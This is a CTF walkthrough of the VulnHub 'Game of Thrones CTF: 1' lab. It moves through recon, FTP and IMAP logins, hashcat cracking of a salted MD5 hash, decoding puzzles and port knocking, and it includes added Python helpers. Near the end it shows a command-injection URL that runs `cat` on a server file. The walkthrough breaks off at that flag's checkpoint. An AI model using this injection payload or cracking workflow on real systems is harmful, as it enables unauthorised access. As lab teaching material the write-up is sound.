
Game of Thrones CTF-1: VulnHub CTF Penetration Testing Write-up

☕ 14 min read · ✍️ IceKam

Introduction

Name: Game of Thrones CTF: 1
Date released: 8 September 2017
Author: OscarAkaElvis
Series: Game of Thrones CTF
URL: https://www.vulnhub.com/entry/game-of-thrones-ctf-1,201/

Description

This is a challenge game that measures your hacking skills, set in the fantasy world of Game of Thrones.

Goals:

Get the 7 kingdom flags and 4 extra-content flags (3 secret flags + the final battle flag). There are 11 in total.

Rules/guidelines:

Start conquering the seven kingdoms.

You need hacking skills, not Game of Thrones knowledge. But if you play, it may contain spoilers for the TV series.

Difficulty of the CTF: medium-high.

Don't forget to bring your map (try to find it). It will guide you through the natural flag order to follow the kingdoms.

Listen carefully to the hints. If you get stuck, read the hints again!

Powerful fail2ban spells are everywhere. Brute force is not an option for this CTF (2-minute ban penalty).

Flags are 32-character strings. Keep 'em all! You'll need them.

Information gathering

nmap is used for the network scan and dirb for the directory scan.

Network information

```bash
$ nmap -sN 192.168.123.1/24
Starting Nmap 7.70 ( https://nmap.org )

Nmap scan report for 7kingdoms.lan (192.168.123.154)
Host is up (0.00026s latency).
Not shown: 991 closed ports
PORT      STATE         SERVICE
21/tcp    open|filtered ftp
22/tcp    open|filtered ssh
53/tcp    open|filtered domain
80/tcp    open|filtered http
143/tcp   open|filtered imap
3306/tcp  open|filtered mysql
5432/tcp  open|filtered postgresql
10000/tcp open|filtered snet-sensor-mgmt
30000/tcp open|filtered ndmps
MAC Address: 08:00:27:79:73:E8 (Oracle VirtualBox virtual NIC)
Nmap done: 256 IP addresses (4 hosts up) scanned in 5.34 seconds
```
  • The target is 192.168.123.154, with a series of ports showing as open (-sN is a TCP NULL scan, which is why every port is reported as open|filtered rather than open).

Directory scan

```bash
# root @ Sec in ~
$ dirb http://192.168.123.154/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Nov  5
URL_BASE: http://192.168.123.154/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.123.154/ ----
==> DIRECTORY: http://192.168.123.154/css/
+ http://192.168.123.154/favicon.ico (CODE:200|SIZE:1150)
==> DIRECTORY: http://192.168.123.154/h/
==> DIRECTORY: http://192.168.123.154/imgs/
+ http://192.168.123.154/index.php (CODE:200|SIZE:2601)
==> DIRECTORY: http://192.168.123.154/js/
==> DIRECTORY: http://192.168.123.154/music/
+ http://192.168.123.154/robots.txt (CODE:200|SIZE:135)
+ http://192.168.123.154/server-status (CODE:403|SIZE:222)
+ http://192.168.123.154/sitemap.xml (CODE:200|SIZE:214)

---- Entering directory: http://192.168.123.154/css/ ----
+ http://192.168.123.154/css/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.123.154/h/ ----
==> DIRECTORY: http://192.168.123.154/h/i/

---- Entering directory: http://192.168.123.154/imgs/ ----
+ http://192.168.123.154/imgs/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.123.154/js/ ----
+ http://192.168.123.154/js/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.123.154/music/ ----
+ http://192.168.123.154/music/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.123.154/h/i/ ----
==> DIRECTORY: http://192.168.123.154/h/i/d/

---- Entering directory: http://192.168.123.154/h/i/d/ ----
==> DIRECTORY: http://192.168.123.154/h/i/d/d/

---- Entering directory: http://192.168.123.154/h/i/d/d/ ----
==> DIRECTORY: http://192.168.123.154/h/i/d/d/e/

---- Entering directory: http://192.168.123.154/h/i/d/d/e/ ----
==> DIRECTORY: http://192.168.123.154/h/i/d/d/e/n/

---- Entering directory: http://192.168.123.154/h/i/d/d/e/n/ ----
+ http://192.168.123.154/h/i/d/d/e/n/index.php (CODE:200|SIZE:732)

-----------------
END_TIME: Mon Nov
DOWNLOADED: 50732 - FOUND: 10
```
  • Opening and checking each result in turn, I gathered the following information:

robots.txt

```text
User-agent: Three-eyed-raven
Allow: /the-tree/
User-agent: *
Disallow: /secret-island/
Disallow: /direct-access-to-kings-landing/
```

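The security-relevant point of the robots.txt step is that every Disallow line is a path the site operator has published for anyone to read, and the per-agent Allow rule is itself a clue about the User-Agent trick used later. The following Python is an added example, not code from the original post or from the CTF, that parses a robots.txt into the paths it discloses and, with the standard library's urllib.robotparser, shows what a compliant crawler would conclude for a given User-Agent. ROBOTS_TXT is a copy of the file shown above; the function names are my own.

```python
from urllib.robotparser import RobotFileParser

# Copy of the robots.txt recovered from the target in the writeup.
ROBOTS_TXT = """\
User-agent: Three-eyed-raven
Allow: /the-tree/
User-agent: *
Disallow: /secret-island/
Disallow: /direct-access-to-kings-landing/
"""


def disclosed_paths(robots_txt: str) -> dict:
    """Map each User-agent to the (directive, path) pairs declared for it.

    Every path listed here is published by the site operator: a Disallow line
    asks polite crawlers to stay away, it restricts nobody who reads the file.
    """
    rules = {}
    agent = None
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blanks
        if not line or ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        key = key.lower()
        if key == "user-agent":
            agent = value
            rules.setdefault(agent, [])
        elif key in ("allow", "disallow") and agent is not None:
            rules[agent].append((key, value))
    return rules


def crawl_policy(robots_txt: str, user_agent: str, path: str) -> bool:
    """What a well-behaved crawler identifying as user_agent would conclude
    about path, using the standard-library robots.txt parser."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(user_agent, path)


if __name__ == "__main__":
    for agent, rules in disclosed_paths(ROBOTS_TXT).items():
        for directive, path in rules:
            print(f"{agent:18} {directive:9} {path}")
    # The per-agent Allow rule is the hint: only "Three-eyed-raven" is invited
    # to /the-tree/, and that agent is not bound by the Disallow lines for "*".
    print(crawl_policy(ROBOTS_TXT, "Three-eyed-raven", "/secret-island/"))
```

The parser deliberately reports the Disallow entries too: from a defender's view, anything listed in robots.txt should be treated as public knowledge and protected by authentication, not by the file.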
/the-tree/ yields:

```text
"You mUSt changE your own shape and foRm if you wAnt to GEt the right aNswer from the Three-eyed raven" - Written on the tree by somebody
```

/secret-island/ yields:

```text
"Take this map and use it wisely. I want to be your friend" - Petyr (Littlefinger) Baelish      /* the directory contains a hint
/imgs/map_to_westeros.jpg       /* links to an image
```

/direct-access-to-kings-landing/ yields:

```text
"I've heard the savages usually play music. They are not as wild as one can expect, are they?" - Sansa Stark
```

/h/i/d/d/e/n/ yields:

```text
"My little birds are everywhere. To enter in Dorne you must say: A_verySmallManCanCastAVeryLargeShad0w . Now, you owe me" - Lord (The Spider) Varys
"Powerful docker spells were cast over all kingdoms. We must be careful! You can't travel directly from one to another... usually. That's what the Lord of Light has shown me" - The Red Woman Melisandr
```

This looks like a hint at a username and a password. Let's set it aside for now and see whether there are other hints.

sitemap.xml

```xml
<urlset>
<url>
<loc>index.php</loc>
<changefreq>never</changefreq>
<priority>1</priority>
</url>
<url>
<loc>raven.php</loc>
<changefreq>never</changefreq>
<priority>0.5</priority>
</url>
</urlset>
```

The /the-tree/ directory holds the hint "You mUSt changE your own shape and foRm if you wAnt to GEt the right aNswer from the Three-eyed raven" - Written on the tree by somebody; the capitalised letters spell USERAGENT, so change the User-Agent header to Three-eyed-raven and resubmit the request, which returns:

```text
meme4.jpg
"I will give you three hints, I can see the future so listen carefully" - The three-eyed raven Bran Stark
"To enter in Dorne you must identify as oberynmartell. You still should find the password"
"3487 64535 12345 . Remember these numbers, you'll need to use them with POLITE people you'll know when to use them"
"The savages never crossed the wall. So you must look for them before crossing it"
```

flag1

A glance at the page shows a music icon; professional instinct says something is off here.

```bash
$ wget http://192.168.123.154/secret-island/meme3.gif
--  http://192.168.123.154/secret-island/meme3.gif
正在连接 127.0.0.1:1089... 已连接。
已发出 Proxy 请求,正在等待回应... 200 OK
长度:2076935 (2.0M) [image/gif]
正在保存至: “meme3.gif.1”

meme3.gif.1         100%[===================>]   1.98M  --.-KB/s  用时 0.007s

 (270 MB/s) - 已保存 “meme3.gif.1” [2076935/2076935])
```

Downloaded and opened it directly.

```bash
$ wget http://192.168.123.154/music/game_of_thrones.mp3
--  http://192.168.123.154/music/game_of_thrones.mp3
正在连接 127.0.0.1:1089... 已连接。
已发出 Proxy 请求,正在等待回应... 200 OK
长度:1685675 (1.6M) [audio/mpeg]
正在保存至: “game_of_thrones.mp3.1”

game_of_thrones.mp3 100%[==================>]   1.61M  --.-KB/s  用时 0.01s

 (131 MB/s) - 已保存 “game_of_thrones.mp3.1” [1685675/1685675])
$ strings 'game_of_thrones.mp3'
Savages secret flag: 8bf8854be
```

That gives the first flag: 8bf8854be

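The strings run above is what surfaced the flag inside game_of_thrones.mp3. The Python below is an added example, not code from the original post, that reimplements the same idea: pull every run of printable ASCII out of a binary file. It goes one step beyond the one-shot tool by also offering a chunked reader that carries a run across read boundaries, so a flag straddling a chunk is neither split into two fragments nor lost when each half is shorter than the minimum length. SAMPLE_MP3 is a constructed byte string standing in for the real file; the function names are my own.

```python
import io
import re

MIN_LEN = 4  # default minimum run length, the same as strings(1)


def _printable_runs(min_len: int):
    return re.compile(rb"[\x20-\x7e]{%d,}" % min_len)


def extract_strings(data: bytes, min_len: int = MIN_LEN) -> list:
    """Every run of at least min_len printable ASCII bytes, in file order."""
    return [m.decode("ascii") for m in _printable_runs(min_len).findall(data)]


def extract_strings_streaming(stream, chunk_size: int = 1 << 16, min_len: int = MIN_LEN) -> list:
    """Same result as extract_strings, but reading a file object chunk by chunk.

    Printable bytes at the end of a chunk may continue in the next one, so they
    are carried over instead of being emitted right away; without that, a flag
    sitting on a chunk boundary would come out as two fragments, or vanish when
    each half is shorter than min_len.
    """
    runs = _printable_runs(min_len)
    trailing = re.compile(rb"[\x20-\x7e]*\Z")   # \Z: true end of buffer, not before a newline
    found, carry = [], b""
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        buf = carry + chunk
        tail = trailing.search(buf).group(0)   # printable bytes at the very end
        body = buf[:len(buf) - len(tail)]      # everything before them is final
        found.extend(m.decode("ascii") for m in runs.findall(body))
        carry = tail
    if len(carry) >= min_len:                  # flush whatever run ended the file
        found.append(carry.decode("ascii"))
    return found


def extract_strings_chunked(data: bytes, chunk_size: int, min_len: int = MIN_LEN) -> list:
    """Run the streaming extractor over in-memory bytes (handy for testing)."""
    return extract_strings_streaming(io.BytesIO(data), chunk_size, min_len)


# Constructed stand-in for game_of_thrones.mp3: an ID3 tag header, a few MPEG
# frame bytes, the embedded hint, then more binary noise. Not the real CTF file.
SAMPLE_MP3 = (
    b"ID3\x03\x00\x00"
    + b"\xff\xfb\x90\x00" * 3
    + b"Savages secret flag: 8bf8854be"
    + b"\x00\xff\xfb" + b"ab" + b"\x00"
)

if __name__ == "__main__":
    # A 7-byte chunk size forces the flag across several read boundaries.
    for s in extract_strings_chunked(SAMPLE_MP3, chunk_size=7):
        print(s)
```

Using `\Z` rather than `$` in the trailing-run pattern matters: `$` also matches just before a final newline byte, which would make the carry logic miscount the buffer whenever a chunk happened to end in 0x0a.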
The wav file gives some information:

```bash
$ wget http://192.168.123.154/music/game_of_thrones.wav
---  http://192.168.123.154/music/game_of_thrones.wav
正在连接 127.0.0.1:1089... 已连接。
已发出 Proxy 请求,正在等待回应... 200 OK
长度:17699406 (17M) [audio/x-wav]
正在保存至: “game_of_thrones.wav.1”

game_of_thrones.wav 100%[=================>]  16.88M  --.-KB/s  用时 0.05s

 (312 MB/s) - 已保存 “game_of_thrones.wav.1” [17699406/17699406])


# root @ Sec in /tmp [14:28:12]
$ binwalk game_of_thrones.wav

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
1393074       0x1541B2        MySQL ISAM index file Version 8
1599419       0x1867BB        MySQL ISAM index file Version 8
5694924       0x56E5CC        MySQL ISAM compressed data file Version 8
5838319       0x5915EF        MySQL ISAM compressed data file Version 11
9130555       0x8B523B        MySQL MISAM compressed data file Version 3
10892382      0xA6345E        MySQL MISAM compressed data file Version 4
12931384      0xC55138        MySQL MISAM compressed data file Version 1
13650693      0xD04B05        MySQL ISAM compressed data file Version 10
16143118      0xF6530E        MySQL ISAM compressed data file Version 7
16422041      0xFA9499        MySQL ISAM index file Version 5
16753196      0xFFA22C        MySQL ISAM index file Version 2
```

flag2

  • From the hints above I put together a username/password pair and finally connected over FTP successfully.
  • After connecting I found two files; let's download them and have a look.
```bash
Name (192.168.123.154:root): oberynmartell
331 User oberynmartell OK. Password required
Password:
230-OK. Current directory is /
230-Welcome to:
230- ____
230-|    \ ___ ___ ___ ___
230-|  |  | . |  _|   | -_|
230-|____/|___|_| |_|_|___|
230-
230-Principality of Dorne was conquered. This is your first kingdom flag!
230 fb8d98be1265dd88bac522e1b2182140
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Connecting to port 45681
-rw-r--r--    1 0          0                 304 Aug 27  2017 problems_in_the_north.txt
-rw-r--r--    1 0          0                 492 Aug 20  2017 the_wall.txt.nc
226-Options: -l
226 2 matches total

ftp> get problems_in_the_north.txt
local: problems_in_the_north.txt remote: problems_in_the_north.txt
200 PORT command successful
150 Connecting to port 34121
226-File successfully transferred
226 0.003 seconds (measured here), 91.35 Kbytes per second
304 bytes received in 0.00 secs (103.8751 kB/s)
ftp> get the_wall.txt.nc
local: the_wall.txt.nc remote: the_wall.txt.nc
200 PORT command successful
150 Connecting to port 58519
226-File successfully transferred
226 0.004 seconds (measured here), 125.15 Kbytes per second
492 bytes received in 0.00 secs (121.1775 kB/s)
```
  • The login banner carries the second flag: fb8d98be1265dd88bac522e1b2182140. The two files inside were downloaded for a closer look.

problems_in_the_north.txt

```text
"There are problems in the north. We must travel quickly. Once there we must defend the wall" - Jon Snow
"What kind of magic is this?!? I never saw before this kind of papirus. Let's check it carefully" - Maester Aemon Targaryen
md5(md5($s).$p)
nobody:6000e084bf18c302eae4559d48cb520c$2hY68a
```
  • A search shows this is an old-style hash format; it needs a dedicated program to crack, and the hash has to be rewritten as 6000e084bf18c302eae4559d48cb520c:2hY68a
```bash
$ ./hashcat-cli64.bin -m 3610 -a 0 /tmp/icekam.txt /usr/share/wordlists/rockyou.txt
Initializing hashcat v2.00 with 4 threads and 32mb segment-size...

Added hashes from file /tmp/icekam.txt: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

6000e084bf18c302eae4559d48cb520c:2hY68a:stark

All hashes have been recovered

Input.Mode: Dict (/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3627099 (words), 33550339 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 3.64M words
Progress..: 3053309/3627099 (84.18%)
Running...: 00:00:00:01
Estimated.: --:--:--:--


Started: Mon Nov  5
Stopped: Mon Nov  5
```
  • Good, we have our password: stark

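The hint md5(md5($s).$p) names the hash construction that hashcat mode 3610 tests, and the run above recovers stark from rockyou in about a second at 3.64M words per second. The Python below is an added example, not code from the original post, that implements that construction, parses the user:hash$salt line from problems_in_the_north.txt into the digest:salt form hashcat was given, and checks candidate passwords against it. Two MD5 computations per candidate is why a whole wordlist can be tried so quickly, which is the lesson for anyone still storing passwords this way. The function names are mine; the three-word candidate list in main is constructed.

```python
import hashlib


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def md5_md5salt_pass(salt: str, password: str) -> str:
    """md5(md5($s).$p): hex digest of the salt, then the password, hashed once more.
    This is the construction hashcat mode 3610 tests."""
    inner = md5_hex(salt.encode()).encode()   # 32 lowercase hex characters
    return md5_hex(inner + password.encode())


def parse_hash_line(line: str):
    """Split 'user:digest$salt' (the layout used in problems_in_the_north.txt)."""
    user, rest = line.strip().split(":", 1)
    digest, salt = rest.split("$", 1)
    return user, digest.lower(), salt


def hashcat_line(digest: str, salt: str) -> str:
    """The digest:salt form the writeup wrote into /tmp/icekam.txt for hashcat."""
    return f"{digest}:{salt}"


def match_wordlist(digest: str, salt: str, candidates):
    """Return the first candidate whose hash equals digest, or None.

    No key stretching is involved: each candidate costs two MD5 calls, so a
    dictionary of millions of words is exhausted in seconds on a laptop.
    """
    for word in candidates:
        if md5_md5salt_pass(salt, word) == digest:
            return word
    return None


# Hash line exactly as found in problems_in_the_north.txt.
HASH_LINE = "nobody:6000e084bf18c302eae4559d48cb520c$2hY68a"

if __name__ == "__main__":
    user, digest, salt = parse_hash_line(HASH_LINE)
    print(hashcat_line(digest, salt))
    # Constructed three-word list standing in for rockyou.txt.
    print(match_wordlist(digest, salt, ["winter", "stark", "snow"]))
```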
flag3

The the_wall.txt.nc file:

```bash
$ binwalk the_wall.txt.nc

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             mcrypt 2.5 encrypted data, algorithm: "rijndael-128", keysize: 32 bytes, mode: "c",
```
  • Good, the encryption scheme is identified; decrypt it directly.
```bash
$ mcrypt -d the_wall.txt.nc
Enter passphrase:
File the_wall.txt.nc was decrypted.
```

Decrypted content:

```text
"We defended the wall. Thanks for your help. Now you can go to recover Winterfell" - Jeor Mormont, Lord Commander of the Night's Watch
"I'll write on your map this route to get faster to Winterfell. Someday I'll be a great maester" - Samwell Tarly
http://winterfell.7kingdoms.ctf/------W1nt3rf3ll------
Enter using this user/pass combination:
User: jonsnow
Pass: Ha1lt0th3k1ng1nth3n0rth!!!
```
  • There is a hostname here; we need to point it at the target IP by editing the local hosts file:
    192.168.123.154 winterfell.7kingdoms.ctf
    Then open http://winterfell.7kingdoms.ctf/------W1nt3rf3ll------ and enter the username and password.

Which gives the flag:

```text
Welcome to Winterfell
You conquered the Kingdom of the North. This is your second kingdom flag!
639bae9ac6b3e1a84cebb7b403297b79

"We must do something here before travelling to Iron Islands, my lady" - Podrick Payne
"Yeah, I can feel the magic on that shield. Swords are no more use here" - Brienne Tarth
```

flag4

After logging in I found an image, stark_shield.jpg, that contains a hint; I downloaded it and read its contents.

```text
"Timef0rconqu3rs TeXT should be asked to enter into the Iron Islands fortress" - Theon Greyjoy
```

It seems to hint at something "txt"; the only thing that comes to mind is a DNS TXT record, so let's try that.

```bash
$ nslookup -q=TXT Timef0rconqu3rs 192.168.123.154
Server:        192.168.123.154
Address:    192.168.123.154#53

** server can't find Timef0rconqu3rs: NXDOMAIN /* failed

$ nslookup -q=TXT Timef0rconqu3rs.7kingdoms.ctf 192.168.123.154
Server:        192.168.123.154
Address:    192.168.123.154#53

Timef0rconqu3rs.7kingdoms.ctf    text = "You conquered Iron Islands kingdom flag: 5e93de3efa544e85dcd6311732d28f95. Now you should go to Stormlands at http://stormlands.7kingdoms.ctf:10000 . Enter using this user/pass combination: aryastark/N3ddl3_1s_a_g00d_sword#!"
```
  • Another username/password: aryastark/N3ddl3_1s_a_g00d_sword#!, with a hint to visit port 10000.
    Add a hosts entry for stormlands.7kingdoms.ctf as before, then open it.

After logging in, http://stormlands.7kingdoms.ctf:10000/ turns out to be a file management system that can also show system load information and the like.

Searching for the ' character finds the file manager; the browser needs Java support, so I accessed it from a virtual machine.
In /home/aryastark I found the flag: 8fc42c6ddf9966db3b09e84365034357

```text
Welcome to:
_____ _ _ _
| __| |_ ___ ___ _____| |___ ___ _| |___
|__ | _| . | _| | | . | | . |_ -|
|_____|_| |___|_| |_|_|_|_|__,|_|_|___|___|
Congratulations! you conquered Stormlands. This is your flag: 8fc42c6ddf9966db3b09e84365034357

Now prepare yourself for the next challenge!

The credentials to access to the Mountain and the Vale kingdom are:
user/pass: robinarryn/cr0wn_f0r_a_King-_
db: mountainandthevale

pgAdmin magic will not work. Command line should be used on that kingdom – Talisa Maegyr

Flag.txt contains the next flag and some useful hints how to proceed.
```

flag5

Another username/password was leaked; from the map this is a PostgreSQL database connection, so log in with the credentials given above.

```bash
$ psql -h 192.168.123.154 -p 5432 -U robinarryn -d mountainandthevale
用户 robinarryn 的口令:
psql (11.0 (Debian 11.0-1+b1), 服务器 9.6.4)
输入 "help" 来获取帮助信息.

mountainandthevale=> \d
                          关联列表
 架构模式 |            名称            |  类型  |   拥有者
----------+----------------------------+--------+------------
 public   | aryas_kill_list            | 数据表 | postgres
 public   | aryas_kill_list_id_seq     | 序列数 | postgres
 public   | braavos_book               | 数据表 | postgres
 public   | eyrie                      | 数据表 | postgres
 public   | eyrie_id_seq               | 序列数 | postgres
 public   | flag                       | 视图   | robinarryn
 public   | popular_wisdom_book        | 数据表 | postgres
 public   | popular_wisdom_book_id_seq | 序列数 | postgres
(8 行记录)

mountainandthevale=> \d+ flag
                         视图 "public.flag"
   栏位   |  类型   | Collation | Nullable | Default | 存储  | 描述
----------+---------+-----------+----------+---------+-------+------
 ?column? | unknown |           |          |         | plain |
视图定义:
 SELECT 'TmljZSEgeW91IGNvbnF1ZXJlZCB0aGUgS2luZ2RvbSBvZiB0aGUgTW91bnRhaW4gYW5kIHRoZSBWYWxlLiBUaGlzIGlzIHlvdXIgZmxhZzogYmIzYWVjMGZkY2RiYzI5NzQ4OTBmODA1YzU4NWQ0MzIuIE5leHQgc3RvcCB0aGUgS2luZ2RvbSBvZiB0aGUgUmVhY2guIFlvdSBjYW4gaWRlbnRpZnkgeW91cnNlbGYgd2l0aCB0aGlzIHVzZXIvcGFzcyBjb21iaW5hdGlvbjogb2xlbm5hdHlyZWxsQDdraW5nZG9tcy5jdGYvSDFnaC5HYXJkM24ucG93YWggLCBidXQgZmlyc3QgeW91IG11c3QgYmUgYWJsZSB0byBvcGVuIHRoZSBnYXRlcw==';

mountainandthevale=>
```
  • The content is base64-obfuscated; decode it.
```text
Nice! you conquered the Kingdom of the Mountain and the Vale. This is your flag: bb3aec0fdcdbc2974890f805c585d432. Next stop the Kingdom of the Reach. You can identify yourself with this user/pass combination: olennatyrell@7kingdoms.ctf/H1gh.Gard3n.powah , but first you must be able to open the gates
```
  • Flag: bb3aec0fdcdbc2974890f805c585d432, together with a hint and another username/password.

Querying the braavos_book table in SQL yields some information:

```sql
mountainandthevale=> SELECT* FROM braavos_book;

Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc
```
  • Decoding with rot16 gives the hint:
```text
The many-faced god wants you to change your face. He wants you to identify as one of your kill list. Select it based on this book's lost page number. The database to connect will be braavos and your password will be: ValarMorghulis
```

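The braavos_book text was decoded above as rot16, i.e. a Caesar shift of 16 positions forward (equivalently, it was encoded by shifting 10). The Python below is an added example, not code from the original post, that implements the shift and goes one step further than the page: it recovers the shift automatically by trying all 26 rotations and scoring each candidate on how many common English words it contains. CIPHERTEXT is the row returned by the query; PLAINTEXT is the decoded hint shown in the writeup; COMMON_WORDS and the function names are my own.

```python
import re
import string

# The row returned by SELECT * FROM braavos_book above.
CIPHERTEXT = (
    "Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc "
    "yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. "
    "Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc"
)
# The hint as decoded in the writeup.
PLAINTEXT = (
    "The many-faced god wants you to change your face. He wants you to identify as "
    "one of your kill list. Select it based on this book's lost page number. "
    "The database to connect will be braavos and your password will be: ValarMorghulis"
)

# Small set of frequent English words used to rank candidate shifts.
COMMON_WORDS = {"the", "and", "you", "to", "of", "be", "will", "this", "it", "as", "on", "your"}


def caesar_shift(text: str, shift: int) -> str:
    """Rotate every ASCII letter forward by shift positions; other characters are kept."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def english_score(text: str) -> int:
    """Count tokens that are common English words; higher means more readable."""
    return sum(1 for word in re.findall(r"[a-z']+", text.lower()) if word in COMMON_WORDS)


def best_shift(text: str) -> int:
    """Try all 26 rotations and return the one that reads most like English."""
    return max(range(26), key=lambda s: english_score(caesar_shift(text, s)))


if __name__ == "__main__":
    shift = best_shift(CIPHERTEXT)
    print(f"best shift: {shift}")
    print(caesar_shift(CIPHERTEXT, shift))
```

The same scoring approach works for any substitution with a small key space; for a Caesar cipher the 26 candidates make an exhaustive search trivial, which is the whole reason such hints are "obfuscation" rather than protection.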
flag6

  • Looking back at the earlier hints, port 143 should be accessible, but an nmap scan said there was no access, and trying 3487, 64535 and 12345 did not work either; with the help of the almighty search engine I found a script that could be used.
```bash
root@Sec:/tmp# git clone https://github.com/grongor/knock.git
正克隆到 'knock'...
remote: Enumerating objects: 20, done.
remote: Total 20 (delta 0), reused 0 (delta 0), pack-reused 20
展开对象中: 100% (20/20), 完成.
root@Sec:/tmp# cd knock/
root@Sec:/tmp/knock# ls
knock  readme.md
root@Sec:/tmp/knock# ./knock 192.168.123.154 3487 64535 12345
```
  • Then scan port 143.
```bash
root@Sec:/tmp/knock# nmap -p143 192.168.123.154
Starting Nmap 7.70 ( https://nmap.org ) at
Nmap scan report for winterfell.7kingdoms.ctf (192.168.123.154)
Host is up (0.00038s latency).

PORT    STATE SERVICE
143/tcp open  imap
MAC Address: 08:00:27:79:73:E8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
```
  • It is open now; connect with telnet.
```bash
root@Sec:/tmp/knock# telnet 192.168.123.154 143
Trying 192.168.123.154...
Connected to 192.168.123.154.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE AUTH=LOGIN AUTH=PLAIN] Kingdom of the Reach
a login olennatyrell@7kingdoms.ctf H1gh.Gard3n.powah
a OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SPECIAL-USE] Logged in
a list "" "*"
* LIST (\HasNoChildren \Trash) "/" Trash
* LIST (\HasNoChildren \Drafts) "/" Drafts
* LIST (\HasNoChildren \Sent) "/" Sent
* LIST (\HasNoChildren) "/" INBOX
a OK List completed (0.000 secs).
a SELECT INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 1 RECENT
* OK [UNSEEN 1] First unseen.
* OK [UIDVALIDITY 1504823858] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
* OK [HIGHESTMODSEQ 1] Highest
a OK [READ-WRITE] Select completed (0.005 secs).
a FETCH 1 ALL
* 1 FETCH (FLAGS (\Recent) INTERNALDATE "08-Sep-2017 00:37:38 +0200" RFC822.SIZE 797 ENVELOPE ("Fri,  8 Sep 2017 00:37:37 +0200 (CEST)" "You conquered the Kingdom of the Reach" (("Sir_Loras_Tyrell" NIL "lorastyrell" "7kingdoms.ctf")) (("Sir_Loras_Tyrell" NIL "lorastyrell" "7kingdoms.ctf")) (("Sir_Loras_Tyrell" NIL "lorastyrell" "7kingdoms.ctf")) ((NIL NIL "olennatyrell" "7kingdoms.ctf")) NIL NIL NIL "<[email protected]>"))
a OK Fetch completed (0.004 secs).
```
  • The message body couldn't be reached this way; a search showed it can be fetched with curl:
```bash
$ curl --insecure \
--url "imap://192.168.123.154/Inbox;UID=1" \
--user "olennatyrell@7kingdoms.ctf:H1gh.Gard3n.powah"
Return-Path: <[email protected]>
Delivered-To: olennatyrell@7kingdoms.ctf
Received: by mail.7kingdoms.ctf (Postfix, from userid 0)
    id E1FA643329; Fri,  8 Sep 2017 00:37:37 +0200 (CEST)
Subject: You conquered the Kingdom of the Reach
From: Sir_Loras_Tyrell<lorastyrell@7kingdoms.ctf>
To: <olennatyrell@7kingdoms.ctf>
X-Mailer: mail (GNU Mailutils 2.99.98)
Message-Id: <[email protected]>
Date: Fri,  8 Sep 2017 00:37:37 +0200 (CEST)

Congratulations!!

You conquered the Kingdom of the Reach. This is the flag: aee750c2009723355e2ac57564f9c3db

Now you can auth on next Kingdom (The Rock, port 1337) using this user/pass combination:
User: TywinLannister
Pass: LannisterN3verDie!

"The things I do for love..." - Jaime (Kingslayer) Lannister
```
  • Flag: aee750c2009723355e2ac57564f9c3db, plus another username/password and a port.

flag7

Open http://192.168.123.154:1337, log in with the credentials above, and in /casterly-rock/blob/master/note_under_the_bed.md there is a string: 2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874

  • It is hex, so convert it:
```bash
$ echo 2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874 | xxd -r -p
/home/tyrionlannister/checkpoint.txt
```

This is clearly a message pointing at a file path; a search turned up a similar vulnerability in this kind of service.
I read the contents of that file directly:
`http://192.168.123.154:1337/casterly-rock/blob/master/%E2%80%9D%E2%80%9D%20%60cat%20/home/tyrionlannister/checkpoint.txt%20%60`
Response:

```bash
 _____ _          _____         _
|_   _| |_ ___   | __  |___ ___| |_
  | | |   | -_|  |    -| . |  _| '_|
  |_| |_|_|___|  |__|__|___|___|_,_|

You are very close to get the flag. Is not here, it's at King's Landing. We must travel there from here!

